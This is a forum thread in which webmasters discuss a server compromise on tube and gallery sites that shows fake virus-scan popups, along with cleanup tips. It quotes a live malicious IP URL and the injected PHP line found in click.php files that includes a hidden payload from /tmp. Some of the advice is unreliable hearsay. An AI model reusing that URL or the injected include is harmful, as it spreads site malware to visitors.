milo99

Hey guys dealing with a brutal hack/virus. These guys are smart as it only usually happens 1 time per ip. You could easily have this virus and you would never know it. I discovered it by accident. This is happening on my tubes that are using STP and TP it is also happening on one of my TGP's using TGPX and A2 so it is likely Server based. There appears to be nothing out of the ordinary on my Server. We have also locked down the server only providing access from my ip but it is still happening.
When it loads you can actually see the gallery or tube start to load then it takes over. You get pop ups saying that you computer needs to be scanned for viruses etc. The domain that loads is this one so i am hoping it looks familiar to someone. I shouldn't have to say this but **DO NOT LOAD THIS IN YOUR BROWSER**
91.226.213.60/1bdeb97e93c47ab826ec1a82c1f427ed63041810d588f02f

This one has me stumped any help would be appreciated

Juicy D. Links

in case people dont see it


**DO NOT LOAD THIS IN YOUR BROWSER**

slizard

It's not a hack. You probably sell traffic to TH.

Each time someone goes to see TH's support about it, they don't know what we're talking about. Saying they visited the offended sites and they saw nothing.

In other words, they act and play stupids cuz they know what is going on and they do jack shit about it cuz probably they have something to win in all that.

And I'm supposed to believe that they know the difference between a real hit and a bot. LOL

slizard

And for those that don't sell any traffic to TH and use free scripts, the skim % to pay for the script goes also to brokers...

milo99

no I don't sell traffic and my trade scripts are paid ones so there is no skim there either. Also my tubes and TGP's trade with different sites all together. This is not only happening on trades as I can see my gallery or tube start to load in the background then this thing takes over. One time it happened on a gallery that I made myself so I know it is clean.
Boy this one is scary!

spazlabz

I wonder if I should load that in my browser






Thanks Milo for the heads up

Harmon

It's porn industry hackers trying to eliminate the scum tube site operator sheep, so everybody can get back to actually making some serious money.

Thanks for the warning Juice

__________________
[email protected]

milo99

Easy my friend. This is a 11 year old domain and the TGP and Tube are 100% legal.

Chosen

Chosen

milo99, what browser are you using?

milo99

I am on a Mac using FF however this also happened to the guy who makes my galleries who is on a PC using Chrome

AdultKing

It can be really hard to detect changes on a well hacked server, you really need to check everything twice or three times as you move it all to a fresh machine. If it is server based, you could never trust that installation again.

I assume you have run all the rootkit checkers etc on the system for clues ?

milo99

Yes my host has been running checks since this started but with no luck. Anyone recommend someone who specializes in this kind of thing?

harvey

we cleaned it last week from a client's server but the motherfucker infected my computer and it took me 2 days to clean everything. You probably got it from an image redirect, it's the new trend.

Anyway, it's a very tedious task, but look for each and every strange file in your server. Then open your php and html files and look at the bottom, you'll probably find an image src (or depending on the version, some JS). Delete it.

Now check your site using Chrome or Safari. DO NOT USE IEXPLOITER (why would anyone? ) and, sad to say, but DO NOT USE FIREFOX 4! It has a bug that allows images to load as exe

If it's clean, time to clean your PC. The only antivirus I know of that catches it is ESET NOD, but maybe other antivirus programs have been updated. This is what I did:

1) log in safe mode
2) run SuperAntispyware
3) run ESET NOD (you can run your AV program)
4) checked registry and cleaned a couple entries left

once you do that and your computer is clean, have your FTP password changed. DO NOT LOGIN TO YOUR SERVER VIA FTP UNTIL YOU DO THIS! Use a very hard to guess key, and if your server allows SFTP, then USE IT!

If everything goes fine, your server and PC will be clean and you're safe to go.

As a general precaution: do not pay attention to "server techs". 90% of them are morons who can't even turn on a computer, much less know about servers. And the chances of you getting one of the remaining 10% are really slim

__________________
This post is endorsed by CIA, KGB, MI6, the Mafia, Illuminati, Kim Jong Il, Worldwide Ninjas Association, Klingon Empire and lolcats. Don't mess around with it, just accept it and embrace the truth

milo99

I think we found this nasty thing. All of my click.php files for TGPX had this attached to them...

$qall=1;$qscr='click.php';@include_once('/tmp/.ICE-unix/err.tmp');

This was a server hack. Keep em' locked up tight!

Horny Guy

check your home router dns settings also and reset the router password ...

they get in to your server using your IP at your home also

__________________
Great hosting and Lots of Ip's

milo99

Thanks Will Do.
Am hoping this was just a permissions thing as the click.php files on other domains that had the correct file permissions appear untouched.

V_RocKs

Hacking is fun

r34lg33k

need to clear your cookies whichever browser you are using, its a 1 occurence a day / ip payload.
we've recently observed these files in TradePulse's /tp/ installation directory as well, easier to spot with ioncube loading in a non-ioncube app. not likely to come up with search tools, an ioncube encoded payload means scanning it is a bit of a pain. a more permanent solution could be to turn ioncube load off but that's not an option with the fact that you already want to run SmartThumbs/SmartTubes

__________________
# icq 2.333.686 - www.CheeChTech.com
# Coding: PhP Perl Java JavaScript Flash SOAP C/C++
# SysAdmin: linux & freebsd

seeandsee

just 1 way to find out what is going on, pay some expert!

__________________
BUY MY SIG - 50$/Year

Contact here